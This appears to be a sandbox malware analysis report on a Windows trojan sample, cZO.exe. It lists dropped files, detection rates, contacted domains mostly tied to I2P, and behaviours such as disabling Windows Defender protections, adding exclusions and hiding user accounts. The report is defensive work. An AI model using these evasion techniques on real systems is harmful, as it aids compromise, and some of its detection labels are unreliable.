Determine Physical LocationsVirtual Private ServerCompromise Hardware Supply ChainUnix ShellSystemd TimersSystemd Timers1
Hidden Users		GUI Input Capture1
System Network Configuration Discovery		Replication Through Removable MediaEmail CollectionProxyExfiltration over USBNetwork Denial of Service
Business RelationshipsServerTrusted RelationshipVisual BasicContainer Orchestration JobContainer Orchestration Job1
Services File Permissions Weakness		Web Portal CaptureLocal GroupsComponent Object Model and Distributed COMLocal Email CollectionInternal ProxyCommonly Used PortDirect Network Flood

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1584500 Sample: cZO.exe Startdate: 05/01/2025 Architecture: WINDOWS Score: 100 94 reseed.onion.im 2->94 96 reseed-pl.i2pd.xyz 2->96 98 2 other IPs or domains 2->98 108 Antivirus detection for URL or domain 2->108 110 Multi AV Scanner detection for dropped file 2->110 112 Multi AV Scanner detection for submitted file 2->112 118 9 other signatures 2->118 10 cZO.exe 3 2->10         started        15 main.exe 2->15         started        17 cZO.exe 2->17         started        19 2 other processes 2->19 signatures3 114 Uses TOR for connection hidding 94->114 116 Performs DNS queries to domains with low reputation 96->116 process4 dnsIp5 100 45.200.148.158, 1129, 49704 Africa-on-Cloud-ASZA Seychelles 10->100 82 C:\...\vc71izwl68ub3txurufnpr09g6ni3.exe, PE32+ 10->82 dropped 84 C:\Users\user\...\shdpeqdz2a54sj46ur0.exe, PE32+ 10->84 dropped 86 C:\Users\user\...\7h14dhb9g32w177ypoi9wje.bat, DOS 10->86 dropped 136 Modifies Windows Defender protection settings 10->136 21 shdpeqdz2a54sj46ur0.exe 10 10->21         started        25 cmd.exe 1 10->25         started        27 vc71izwl68ub3txurufnpr09g6ni3.exe 3 10->27         started        138 Contains functionality to hide user accounts 15->138 140 Found Tor onion address 15->140 142 Detected unpacking (creates a PE file in dynamic memory) 17->142 29 WerFault.exe 19->29         started        file6 signatures7 process8 file9 80 C:\Users\Public\...\main.exe, PE32+ 21->80 dropped 122 Multi AV Scanner detection for dropped file 21->122 124 Contains functionality to hide user accounts 21->124 126 Machine Learning detection for dropped file 21->126 128 Found Tor onion address 21->128 31 sc.exe 1 21->31         started        33 taskkill.exe 1 21->33         started        35 sc.exe 21->35         started        46 4 other processes 21->46 130 Modifies Windows Defender protection settings 25->130 132 Adds a directory exclusion to Windows Defender 25->132 37 powershell.exe 23 25->37         started        40 powershell.exe 23 25->40         started        42 powershell.exe 23 25->42         started        44 conhost.exe 25->44         started        134 Antivirus detection for dropped file 27->134 signatures10 process11 signatures12 48 main.exe 31->48         started        53 conhost.exe 31->53         started        55 conhost.exe 33->55         started        57 conhost.exe 35->57         started        120 Loading BitLocker PowerShell Module 37->120 59 conhost.exe 46->59         started        61 conhost.exe 46->61         started        63 conhost.exe 46->63         started        65 conhost.exe 46->65         started        process13 dnsIp14 88 78.191.208.199 TTNETTR Turkey 48->88 90 reseed-pl.i2pd.xyz 185.226.181.238 RACKMARKTES Spain 48->90 92 56 other IPs or domains 48->92 70 C:\Windows\Temp\o6oDuAJl, PE32+ 48->70 dropped 72 C:\Windows\Temp\YkhL6reh, PE32+ 48->72 dropped 74 C:\Windows\Temp\YXkdIYk6, PE32+ 48->74 dropped 76 15 other files (13 malicious) 48->76 dropped 102 Multi AV Scanner detection for dropped file 48->102 104 Contains functionality to hide user accounts 48->104 106 Found Tor onion address 48->106 67 WerFault.exe 48->67         started        file15 signatures16 process17 file18 78 C:\ProgramData\Microsoft\...\Report.wer, Unicode 67->78 dropped

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
cZO.exe11%ReversingLabsWin64.Trojan.Generic
cZO.exe19%VirustotalBrowse

Dropped Files

SourceDetectionScannerLabelLink
C:\Users\user\AppData\Local\Temp\vc71izwl68ub3txurufnpr09g6ni3.exe100%AviraTR/AVI.Agent.jibab
C:\Users\user\AppData\Local\Temp\shdpeqdz2a54sj46ur0.exe100%Joe Sandbox ML
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\cnccli.dll26%ReversingLabsWin64.Trojan.Generic
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\dwlmgr.dll8%ReversingLabsWin64.Trojan.Generic
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\evtsrv.dll32%ReversingLabsWin64.Trojan.Generic
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\libi2p.dll3%ReversingLabs
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe70%ReversingLabsWin64.Trojan.Barys
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\prgmgr.dll8%ReversingLabsWin64.Trojan.Generic
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\rdpctl.dll3%ReversingLabs
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\rfxvmt.dll0%ReversingLabs
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\samctl.dll3%ReversingLabs
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\termsrv32.dll70%ReversingLabsWin64.Trojan.Generic
C:\Users\user\AppData\Local\Temp\shdpeqdz2a54sj46ur0.exe70%ReversingLabsWin64.Trojan.Barys
C:\Users\user\AppData\Local\Temp\vc71izwl68ub3txurufnpr09g6ni3.exe58%ReversingLabsWin64.Trojan.Alevaul
C:\Windows\Temp\EgwqOk243%ReversingLabs
C:\Windows\Temp\GEGgzh0s0%ReversingLabs
C:\Windows\Temp\GmdNT1AN8%ReversingLabsWin64.Trojan.Generic
C:\Windows\Temp\I77yQ5in26%ReversingLabsWin64.Trojan.Generic
C:\Windows\Temp\OwuZZod23%ReversingLabs
C:\Windows\Temp\XpOp833v3%ReversingLabs
C:\Windows\Temp\YXkdIYk670%ReversingLabsWin64.Trojan.Generic
C:\Windows\Temp\YkhL6reh32%ReversingLabsWin64.Trojan.Generic
C:\Windows\Temp\o6oDuAJl8%ReversingLabsWin64.Trojan.Generic

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
https://banana.incognet.io/p0%Avira URL Cloudsafe
https://reseed.memcpy.io/0%Avira URL Cloudsafe
https://i2pseed.creativecowpat.net:8443/0%Avira URL Cloudsafe
https://reseed.memcpy.io:443/i2pseeds.su30%Avira URL Cloudsafe
https://reseed.diva.exchange/b.c100%Avira URL Cloudmalware
https://reseed.i2pgit.org/i2pseeds.su3100%Avira URL Cloudmalware
https://reseed.stormycloud.org/b.c0%Avira URL Cloudsafe
https://reseed.i2pgit.org:443/i2pseeds.su3100%Avira URL Cloudmalware
https://reseed-fr.i2pd.xyz/p0%Avira URL Cloudsafe
https://reseed-pl.i2pd.xyz:443/i2pseeds.su30%Avira URL Cloudsafe
https://banana.incognet.io/0%Avira URL Cloudsafe
https://login.live100%Avira URL Cloudmalware
https://reseed.i2pgit.org/P#100%Avira URL Cloudmalware
http://shx5vqsw7usdaunyzr2qmes2fq37oumybpudrd4jjj4e4vk4uusa.b32.i2p/hosts.txt0%Avira URL Cloudsafe
https://i2p.ghativega.in/0%Avira URL Cloudsafe
https://reseed-pl.i2pd.xyz/i2pseeds.su300%Avira URL Cloudsafe
https://i2p.novg.net/0%Avira URL Cloudsafe
https://reseed-fr.i2pd.xyz/0%Avira URL Cloudsafe
https://www2.mk16.de/0%Avira URL Cloudsafe
http://shx5vqsw7usdaunyzr2qmes2fq37oumybpudrd4jjj4e4vk4uusa.b32.i2p/hosts.txt/0%Avira URL Cloudsafe
http://shx5vqsw7usdaunyzr2qmes2fq37oumybpudrd4jjj4e4vk4uusa.b32.i2p/hosts.txtF&P#0%Avira URL Cloudsafe
http://reg.i2p/hosts.txt0%Avira URL Cloudsafe
https://reseed.onion.im/i2pseeds.su30%Avira URL Cloudsafe
http://identiguy.i2p/hosts.txt0%Avira URL Cloudsafe
https://reseed.memcpy.io/hP#0%Avira URL Cloudsafe
https://reseed.diva.exchange/100%Avira URL Cloudmalware
https://reseed.stormycloud.org/0%Avira URL Cloudsafe
https://i2pd.readthedocs.io/en/latest/user-guide/configuration/0%Avira URL Cloudsafe
https://reseed.i2pgit.org/100%Avira URL Cloudmalware
https://i2pseed.creativecowpat.net:8443/G0%Avira URL Cloudsafe
https://i2p.novg.net/:0%Avira URL Cloudsafe
http://shx5vqsw7usdaunyzr2qmes2fq37oumybpudrd4jjj4e4vk4uusa.b32.i2p/hosts.txti2p.su30%Avira URL Cloudsafe
https://reseed-pl.i2pd.xyz:443/i2pseeds.su3T0%Avira URL Cloudsafe
http://127.0.0.1:81180%Avira URL Cloudsafe
http://stats.i2p/cgi-bin/newhosts.txt0%Avira URL Cloudsafe
https://reseed-pl.i2pd.xyz/0%Avira URL Cloudsafe
https://i2p.mooo.com/netDb/0%Avira URL Cloudsafe
https://reseed2.i2p.net/100%Avira URL Cloudmalware
https://reseed.onion.im/0%Avira URL Cloudsafe
https://reseed.stormycloud.org/??0%Avira URL Cloudsafe
https://reseed.stormycloud.org/70%Avira URL Cloudsafe
https://reseed.i2pgit.org/i2pseeds.su30100%Avira URL Cloudmalware
https://netdb.i2p2.no/100%Avira URL Cloudmalware
https://reseed.i2p-projekt.de/0%Avira URL Cloudsafe
https://www2.mk16.de/J0%Avira URL Cloudsafe
https://reseed-pl.i2pd.xyz/i2pseeds.su30%Avira URL Cloudsafe
http://reg.i2p/hosts.txt90%Avira URL Cloudsafe
https://legit-website.com/i2pseeds.su30%Avira URL Cloudsafe
https://i2p.ghativega.in/b.c0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
bg.microsoft.map.fastly.net
199.232.214.172
truefalse
    		high
    reseed.i2pgit.org
    		68.183.196.133
    		truetrue
      		unknown
      reseed.memcpy.io
      		95.216.2.172
      		truetrue
        		unknown
        reseed.onion.im
        		159.223.194.171
        		truetrue
          		unknown
          reseed-pl.i2pd.xyz
          		185.226.181.238
          		truetrue
            		unknown

            URLs from Memory and Binaries

            NameSourceMaliciousAntivirus DetectionReputation
            https://banana.incognet.io/pmain.exe, 00000020.00000002.3262053344.00000270D3D82000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            https://reseed.diva.exchange/b.cmain.exe, 00000016.00000002.3155678668.00000223502E7000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000016.00000003.2471613149.00000223502F9000.00000004.00000020.00020000.00000000.sdmptrue
            • Avira URL Cloud: malware
            		unknown
            https://i2pseed.creativecowpat.net:8443/main.exe, 00000020.00000002.3262053344.00000270D3D82000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000020.00000002.3262201152.00000270D4100000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000020.00000002.3263308068.00007FF8A8C54000.00000002.00000001.01000000.0000000C.sdmp, update.pkg.11.drtrue
            • Avira URL Cloud: safe
            		unknown
            https://reseed.memcpy.io:443/i2pseeds.su3main.exe, 00000016.00000003.2471943070.000002235030D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000016.00000003.2471338802.0000022350309000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000016.00000003.2471413512.000002235030B000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            https://reseed-pl.i2pd.xyz:443/i2pseeds.su3main.exe, 00000016.00000003.2484244836.00000223506CE000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000016.00000003.2494432573.00000223506CE000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            https://reseed.memcpy.io/main.exe, 00000020.00000002.3262053344.00000270D3D82000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000020.00000002.3263308068.00007FF8A8C54000.00000002.00000001.01000000.0000000C.sdmp, update.pkg.11.drtrue
            • Avira URL Cloud: safe
            		unknown
            https://login.microsoftonline.com/ppsecure/ResolveUser.srfsvchost.exe, 0000001F.00000002.3262495369.000001D378A46000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023913746.000001D37934D000.00000004.00000020.00020000.00000000.sdmpfalse
              		high
              http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdAsvchost.exe, 0000001F.00000003.3143580946.000001D37930F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3143291121.000001D37930E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3156389621.000001D379307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3112272695.000001D37930E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3111493334.000001D37930E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3183931947.000001D37930F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3143546975.000001D37930E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3263042958.000001D379310000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3156417903.000001D37930F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3111460681.000001D37930F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3183773272.000001D37930E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3184036782.000001D37930E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3130778572.000001D37930E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3111301830.000001D379307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3111317881.000001D37930E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3183261030.000001D379308000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3183958551.000001D37930E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3184178913.000001D37930E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3143745371.000001D37930F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3199403669.000001D37930E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3112006865.000001D37930E000.00000004.00000020.00020000.00000000.sdmpfalse
                		high
                http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issuesvchost.exe, 0000001F.00000003.3199377490.000001D37936D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3263235797.000001D37936F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3199443216.000001D37936E000.00000004.00000020.00020000.00000000.sdmpfalse
                  		high
                  https://reseed-fr.i2pd.xyz/pmain.exe, 00000020.00000002.3262053344.00000270D3D82000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://reseed.stormycloud.org/b.cmain.exe, 00000020.00000002.3262053344.00000270D3D82000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdAAAAAsvchost.exe, 0000001F.00000003.3130435099.000001D379329000.00000004.00000020.00020000.00000000.sdmpfalse
                    		high
                    http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdssvchost.exe, 0000001F.00000002.3263271717.000001D37937C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3143492582.000001D37937A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3183985353.000001D37937C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3183713515.000001D37937C000.00000004.00000020.00020000.00000000.sdmpfalse
                      		high
                      https://login.microsoftonline.com/ppsecure/EnumerateDevices.srfsvchost.exe, 0000001F.00000002.3262495369.000001D378A46000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023982986.000001D379363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023913746.000001D37934D000.00000004.00000020.00020000.00000000.sdmpfalse
                        		high
                        https://reseed.i2pgit.org/i2pseeds.su3main.exe, 00000016.00000003.2503133983.00000223506CE000.00000004.00000020.00020000.00000000.sdmptrue
                        • Avira URL Cloud: malware
                        		unknown
                        https://account.live.com/InlineSignup.aspx?iww=1&id=80502svchost.exe, 0000001F.00000002.3262495369.000001D378A46000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023982986.000001D379363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023913746.000001D37934D000.00000004.00000020.00020000.00000000.sdmpfalse
                          		high
                          https://reseed.i2pgit.org:443/i2pseeds.su3main.exe, 00000016.00000003.2503133983.00000223506CE000.00000004.00000020.00020000.00000000.sdmptrue
                          • Avira URL Cloud: malware
                          		unknown
                          https://banana.incognet.io/main.exe, 00000020.00000002.3262053344.00000270D3D82000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000020.00000002.3263308068.00007FF8A8C54000.00000002.00000001.01000000.0000000C.sdmp, update.pkg.11.drtrue
                          • Avira URL Cloud: safe
                          		unknown
                          http://Passport.NET/tb_svchost.exe, 0000001F.00000002.3263489218.000001D379854000.00000004.00000020.00020000.00000000.sdmpfalse
                            		high
                            https://login.livesvchost.exe, 0000001F.00000002.3262816840.000001D378B02000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: malware
                            		unknown
                            https://reseed-pl.i2pd.xyz/i2pseeds.su30main.exe, 00000016.00000003.2494432573.00000223506CE000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://shx5vqsw7usdaunyzr2qmes2fq37oumybpudrd4jjj4e4vk4uusa.b32.i2p/hosts.txtupdate.pkg.11.drfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://reseed-fr.i2pd.xyz/main.exe, 00000020.00000002.3262053344.00000270D3D82000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000020.00000002.3263308068.00007FF8A8C54000.00000002.00000001.01000000.0000000C.sdmp, update.pkg.11.drtrue
                            • Avira URL Cloud: safe
                            		unknown
                            https://i2p.novg.net/main.exe, 00000020.00000002.3262053344.00000270D3D82000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000020.00000002.3263308068.00007FF8A8C54000.00000002.00000001.01000000.0000000C.sdmp, update.pkg.11.drtrue
                            • Avira URL Cloud: safe
                            		unknown
                            https://reseed.i2pgit.org/P#main.exe, 00000016.00000002.3155678668.00000223502E7000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000016.00000003.2471613149.00000223502F9000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: malware
                            		unknown
                            https://account.live.com/msangcwamsvchost.exe, 0000001F.00000002.3262495369.000001D378A46000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023966604.000001D379340000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023697164.000001D379329000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023950758.000001D379357000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023930406.000001D37933B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023799636.000001D379352000.00000004.00000020.00020000.00000000.sdmpfalse
                              		high
                              http://crl.ver)svchost.exe, 0000001F.00000002.3262697506.000001D378AC7000.00000004.00000020.00020000.00000000.sdmpfalse
                                		high
                                https://i2p.ghativega.in/main.exe, 00000020.00000002.3262053344.00000270D3D82000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000020.00000002.3263308068.00007FF8A8C54000.00000002.00000001.01000000.0000000C.sdmp, update.pkg.11.drtrue
                                • Avira URL Cloud: safe
                                		unknown
                                http://passport.net/tbsvchost.exe, 0000001F.00000002.3262531893.000001D378A5E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3263392705.000001D379813000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3263489218.000001D379854000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		high
                                  http://shx5vqsw7usdaunyzr2qmes2fq37oumybpudrd4jjj4e4vk4uusa.b32.i2p/hosts.txt/main.exe, 00000016.00000002.3155678668.000002235025D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000020.00000002.3261726260.00000270D3CED000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://www2.mk16.de/main.exe, 00000020.00000002.3262053344.00000270D3D82000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000020.00000002.3263308068.00007FF8A8C54000.00000002.00000001.01000000.0000000C.sdmp, update.pkg.11.drtrue
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://reg.i2p/hosts.txtupdate.pkg.11.drfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://shx5vqsw7usdaunyzr2qmes2fq37oumybpudrd4jjj4e4vk4uusa.b32.i2p/hosts.txtF&P#main.exe, 00000016.00000002.3155678668.000002235025D000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdssvchost.exe, 0000001F.00000003.3183985353.000001D37937C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3183713515.000001D37937C000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		high
                                    https://reseed.onion.im/i2pseeds.su3main.exe, 00000020.00000002.3262201152.00000270D4100000.00000004.00000020.00020000.00000000.sdmptrue
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://identiguy.i2p/hosts.txtshdpeqdz2a54sj46ur0.exe, 0000000B.00000002.2510930956.00007FF76A97E000.00000004.00000001.01000000.00000007.sdmp, main.exe, 00000016.00000002.3155007370.000002234FE24000.00000004.00000020.00020000.00000000.sdmp, i2p.conf.22.dr, update.pkg.11.drfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://reseed.memcpy.io/hP#main.exe, 00000016.00000002.3155678668.00000223502E7000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000016.00000003.2471613149.00000223502F9000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://reseed.diva.exchange/main.exe, 00000020.00000002.3262053344.00000270D3D82000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000020.00000002.3263308068.00007FF8A8C54000.00000002.00000001.01000000.0000000C.sdmp, update.pkg.11.drtrue
                                    • Avira URL Cloud: malware
                                    		unknown
                                    http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issuesvchost.exe, 0000001F.00000003.3111366178.000001D37936E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3199377490.000001D37936D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3263235797.000001D37936F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3199443216.000001D37936E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3121387179.000001D379366000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      https://i2pd.readthedocs.io/en/latest/user-guide/configuration/shdpeqdz2a54sj46ur0.exe, 0000000B.00000002.2510930956.00007FF76A97E000.00000004.00000001.01000000.00000007.sdmp, main.exe, 00000016.00000002.3155007370.000002234FE24000.00000004.00000020.00020000.00000000.sdmp, i2p.conf.22.dr, update.pkg.11.drfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdessvchost.exe, 0000001F.00000003.3183985353.000001D37937C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3183713515.000001D37937C000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		high
                                        http://schemas.xmlsoap.org/ws/2005/02/trust/Issueesvchost.exe, 0000001F.00000003.3199377490.000001D37936D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3263235797.000001D37936F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3199443216.000001D37936E000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          https://reseed.stormycloud.org/main.exe, 00000020.00000002.3262053344.00000270D3D82000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000020.00000002.3263308068.00007FF8A8C54000.00000002.00000001.01000000.0000000C.sdmp, update.pkg.11.drtrue
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://i2pseed.creativecowpat.net:8443/Gmain.exe, 00000020.00000002.3262201152.00000270D4100000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdmlns:svchost.exe, 0000001F.00000003.3037162349.000001D379352000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            https://login.microsoftonline.com/ppsecure/DeviceDisassociate.srf:CLSIDsvchost.exe, 0000001F.00000003.3023767682.000001D379310000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
                                              https://login.microsoftonline.com/ppsecure/deviceremovecredential.srfsvchost.exe, 0000001F.00000002.3262495369.000001D378A46000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023767682.000001D379310000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdAAAAsvchost.exe, 0000001F.00000003.3130435099.000001D379329000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://login.microsoftonline.com/ppsecure/DeviceQuery.srfsvchost.exe, 0000001F.00000003.3023982986.000001D379363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023913746.000001D37934D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://schemas.xmlsoap.org/soap/envelope/svchost.exe, 0000001F.00000003.3111493334.000001D37930E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3111460681.000001D37930F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3112006865.000001D37930E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3111952207.000001D37930E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3111425069.000001D37930E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3263196941.000001D37935F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://schemas.xmlsoap.org/ws/2004/09/policysrfsvchost.exe, 0000001F.00000003.3111366178.000001D37936E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3199377490.000001D37936D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3263235797.000001D37936F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3199443216.000001D37936E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3121387179.000001D379366000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://schemas.xmlsoap.org/ws/2005/02/scnsvchost.exe, 0000001F.00000002.3263092922.000001D379313000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://schemas.xmlsoap.org/ws/2005/02/trustsvchost.exe, 0000001F.00000002.3263196941.000001D37935F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3199322434.000001D37930F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3183904232.000001D37930F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3263092922.000001D379313000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://reseed.i2pgit.org/main.exe, 00000020.00000002.3262053344.00000270D3D82000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000020.00000002.3263308068.00007FF8A8C54000.00000002.00000001.01000000.0000000C.sdmp, update.pkg.11.drtrue
                                                            • Avira URL Cloud: malware
                                                            		unknown
                                                            http://shx5vqsw7usdaunyzr2qmes2fq37oumybpudrd4jjj4e4vk4uusa.b32.i2p/hosts.txti2p.su3main.exe, 00000020.00000002.3261726260.00000270D3CED000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            https://i2p.novg.net/:main.exe, 00000016.00000002.3155678668.000002235025D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
